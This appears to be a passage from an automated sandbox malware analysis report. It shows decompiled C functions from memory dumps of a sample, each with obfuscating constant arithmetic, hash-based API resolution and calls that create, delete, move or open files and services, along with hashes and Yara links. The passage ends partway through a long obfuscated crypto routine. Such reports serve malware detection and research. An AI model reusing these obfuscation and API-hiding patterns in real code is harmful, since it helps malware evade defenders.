Instruction Fuzzy Hash: 2311B072911188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0024B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0024B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0024602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002507A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0024b569
0x0024b56a
0x0024b56d
0x0024b572
0x0024b574
0x0024b577
0x0024b57a
0x0024b57d
0x0024b580
0x0024b583
0x0024b586
0x0024b587
0x0024b58a
0x0024b58d
0x0024b590
0x0024b593
0x0024b594
0x0024b595
0x0024b59a
0x0024b5a4
0x0024b5b8
0x0024b5c0
0x0024b5c4
0x0024b5cb
0x0024b5d2
0x0024b5d9
0x0024b5e6
0x0024b5fd
0x0024b604

APIs

CreateFileW.KERNELBASE(00250668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00250668,?,?,?,?), ref: 0024B5FD

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: da88616ffe8399f7017eec6f07960afbc01f85520a9177dc866ba64319bbb634
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 3111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0025981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0025981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002507A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00259821
0x00259822
0x00259825
0x00259828
0x0025982a
0x0025982c
0x0025982f
0x00259832
0x00259835
0x00259836
0x00259837
0x0025983c
0x00259855
0x00259858
0x0025985f
0x00259866
0x0025986d
0x00259874
0x0025987b
0x0025988e
0x0025989b
0x002598a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002487F2,0000CAAE,0000510C,AD82F196), ref: 0025989B

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: dfd0e70f4a19a4487747f8be9ec32f2a0c8de25ba219de84762fb4ff62ba155e
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 17015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00257BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00257BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002507A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00257bf7
0x00257bf8
0x00257bfa
0x00257bfd
0x00257bff
0x00257c02
0x00257c06
0x00257c07
0x00257c0f
0x00257c1d
0x00257c25
0x00257c2d
0x00257c31
0x00257c38
0x00257c3f
0x00257c46
0x00257c4a
0x00257c5e
0x00257c67
0x00257c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00257C67

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: f6689cddd0042f70b7a9cdd3172e5f8eaee73f7251d997c54e2e26b7b788de0d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: EB014FB190120CFFEB09DF94CC4A8DEBBB5EF45314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0024F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002507A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0024f662
0x0024f663
0x0024f665
0x0024f668
0x0024f66a
0x0024f66d
0x0024f670
0x0024f673
0x0024f677
0x0024f678
0x0024f67d
0x0024f687
0x0024f693
0x0024f69a
0x0024f6a1
0x0024f6a5
0x0024f6a9
0x0024f6b0
0x0024f6c9
0x0024f6d8
0x0024f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0024F6D8

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 734ab44cd992f2a84b361ecf90ffb5bf997b8202504bb139d782407486199198
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: CC01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0024B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0024602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002507A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0024b6f3
0x0024b6f8
0x0024b702
0x0024b70b
0x0024b712
0x0024b719
0x0024b720
0x0024b727
0x0024b72e
0x0024b747
0x0024b759
0x0024b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0024B759

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: c757ade2f88ba2662d3f67edc083fcb31f26e0c1be5662b87ba0d73f9a050897
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: F1018FB194030CFBEF45DF90DD06E9E7BB5EF08704F108188FA0526190D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0025AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0025AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002507A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0025aa3f
0x0025aa40
0x0025aa41
0x0025aa44
0x0025aa47
0x0025aa4b
0x0025aa4c
0x0025aa51
0x0025aa5b
0x0025aa64
0x0025aa68
0x0025aa6f
0x0025aa76
0x0025aa8d
0x0025aa90
0x0025aa9d
0x0025aaa8
0x0025aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0025AAA8

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 647ffb927a8bba167ed28c8484d0523fe10928a11d52fb189364724a1cd49019
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 43F069B191020CFFDF08DF94DD4A89EBFB4EB45304F108088F805A6250D3B29F649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000745a
0x1000745c
0x1000745e
0x10007460
0x10007468

APIs

_doexit.LIBCMT ref: 10007460

Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00249FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00249FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0024602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
